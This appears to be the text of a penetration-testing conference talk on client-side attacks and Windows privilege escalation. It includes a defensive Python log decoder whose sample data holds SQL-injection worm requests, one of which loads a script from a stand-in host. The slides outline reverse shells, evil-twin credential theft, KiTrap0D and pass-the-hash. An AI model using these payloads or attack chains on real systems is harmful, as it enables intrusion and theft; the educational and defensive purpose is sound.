Tactical Assassins: Client-Side OWNage

Prathan Phongthiproek, ACIS Professional Center, Senior Information Security Consultant

Description: client-side exploitation techniques for attacking the client side and then getting into the intranet for fun, plus the latest Microsoft vulnerability that went unpatched for a year (MS sucks...).

Who am I?!

- Instructor / Speaker
- Red Team: Penetration Tester (Team Leader)
- Security Consultant / Researcher
- CWH Underground
- Exploits and vulnerabilities disclosure: Milw0rm, Exploit-db, SecurityFocus, Secunia, Zeroday, etc.

Let's Talk!

- Attack Layer 8: Client-Side OWNage
  - MS Office (Evil Macro)
  - Malicious Adobe PDF
  - Malicious USB
  - One-Click Attack
  - Evil-Twin Attack!
- Built-in Pen-Test Tactics
  - Black Hat versus White Hat
  - Using Black Hat styles to compromise systems
- Operation CloudBurst

Client-Side OWNage: The Way to Attack Layer 8!

MS Office (Evil Macro)!

- MS Office is Evil!!

Malicious Adobe PDF!

- Malicious PDF file

Malicious USB!

- Autoplay is NOT Autorun
- Turning off Autoplay -> the machine is still vulnerable to an evil USB
- Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer -> 0xff

One-Click Attack!

- SQL Injection Worms - MSSQL!




- SQL Injection Worms - Oracle!

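As an added example that is not part of the original slides, a defender-side decoder for the two worm styles shown above: it scans web-server log lines for the MSSQL `CAST(0x... AS NVARCHAR)` hex trick and the Oracle `chr()||chr()` obfuscation, recovers the statement each one carries, and flags script injection. The log lines and the script URL are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not from the slides): one MSSQL worm-style
# request, one Oracle chr()-obfuscated request, and one benign request.
_SAMPLE_STMT = "update [t] set [c]=[c]+'<script src=http://example.invalid/k.js></script>'"
_SAMPLE_HEX = _SAMPLE_STMT.encode("utf-16-le").hex().upper()   # NVARCHAR hex is UTF-16LE
SAMPLE_LOG = [
    "GET /page.asp?id=1';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + _SAMPLE_HEX + "%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.1",
    "GET /ora4.php?name=1%20and%201=(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES("
    "'FOO','BAR','DBMS_OUTPUT%22.PUT(:P1);'||chr(117)||chr(112)||chr(100)||chr(97)||chr(116)||chr(101)"
    "%20from%20dual)-- HTTP/1.1",
    "GET /page.asp?id=42 HTTP/1.1",
]

CAST_HEX_RE = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.IGNORECASE)
CHR_CHAIN_RE = re.compile(r"(?:chr\(\d+\)\s*(?:\|\|\s*)?){3,}", re.IGNORECASE)
SQLI_MARKERS = ("DECLARE @", "EXEC(@", "DBMS_EXPORT_EXTENSION", "sysobjects", "ALL_TAB_COLUMNS")

def decode_cast_hex(hexstr):
    """CAST(0x... AS NVARCHAR) carries UTF-16LE text; fall back to latin-1."""
    raw = bytes.fromhex(hexstr)
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return raw.decode("latin-1")

def decode_chr_chain(chain):
    """Turn chr(117)||chr(112)||... back into the string it spells."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", chain, re.IGNORECASE))

def analyse_request(line):
    """Return None for a benign line, else a dict describing the suspicious request."""
    decoded = unquote(line)                       # undo %20 etc. before matching
    findings = [m for m in SQLI_MARKERS if m.lower() in decoded.lower()]
    payloads = [decode_cast_hex(h) for h in CAST_HEX_RE.findall(decoded)]
    payloads += [decode_chr_chain(c) for c in CHR_CHAIN_RE.findall(decoded)]
    if not findings and not payloads:
        return None
    return {"markers": findings, "payloads": payloads,
            "injects_script": any("<script" in p.lower() for p in payloads)}

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(analyse_request(entry))
```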

- Link to malicious website
- Reverse shell to attacker

Evil-Twin Attack!

- Karma + Metasploit = Karmetasploit!!
- Rogue Access Point (Evil Twin): steal usernames, passwords and information from public wireless hotspots
- Why don't we steal something evil like credit cards (Pay to Play)??

Built-in Pen-Test Tactics!

Black Hat versus White Hat!

Thinking outside of the box:
- Know one piece of information and have to expand from there
- Compromise all systems, then target the attack
- All methodologies are integrated
- Manual footprinting, no noisy scan, just Nmap and a 0-day attack
- Attack Layer 8: Client-Side OWNage

Thinking inside the box:
- Assigned a limited block of IP addresses
- Unable to go beyond the scope of the approved list: only touch xyz hosts, don't touch abc host
- Follow pen-test methodologies: OSSTMM, NIST, ISSAF
- Download exploits from Milw0rm, exploit with Core Impact, CANVAS, Metasploit
- Oops, I cannot hack the user.

- Pen-testers must "think outside of the box"
- Attack Layer 8: more effective results
- Pen-test with Black Hat styles
  - Using a Black Hat mind
  - Email address enumeration
  - Social networking (Maltego)
  - Social engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc.)
  - Information gathering: all subdomains (xyz.victim.com, abc.victim.com, 123.victim.com)
  - Blind test, compromise all systems, then target the attack

Using Black Hat styles to compromise systems

Operation CloudBurst!

KiTrap0D – Local Ring0 Kernel Exploit

- MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
- Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
- Not affected: Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)
- Patch released as MS10-015 on Feb 09 2010
- 0-day for 1 month. W00t! W00t!

Get The Hell Outta Here!!

Token Kidnapping – Elevate Privilege

- Token: think of it as the Windows equivalent of a web cookie
- On Windows XP / 2003, Windows services run as the SYSTEM account: compromise of a service == full system compromise
- On Windows Vista / 2008, LocalService / NetworkService == SYSTEM
- Affects every release of the Windows NT kernel (Windows 2000, XP, Server 2003, Vista, Server 2008, 7)
- Patch released as MS09-012 on April 14 2009
- 0-day for 1 year. W00t! W00t!!
- Black Hat mind!! Combine Attack Layer 8 + KiTrap0D + Token Kidnapping

Operation CloudBurst

- Start the mission with Attack Layer 8: SPAM mail / 1-Click Ownage, reverse shell to the attacker
- KiTrap0D – the message from slave to God: 0-day Ring0 exploit, all Windows OS
- Maintain access: pivot (tunneling), backdoor position
- Compromise all systems and the Domain Controller: impersonate token, pass-the-hash attack

Operation CloudBurst!

(Diagram: Internet -> reverse shell connection to attacker -> KiTrap0D exploit -> pivot network (route add) -> attack network (pass-the-hash, impersonate token) -> Intranet)


If someone is still in the room... Q&A!

THANK YOU!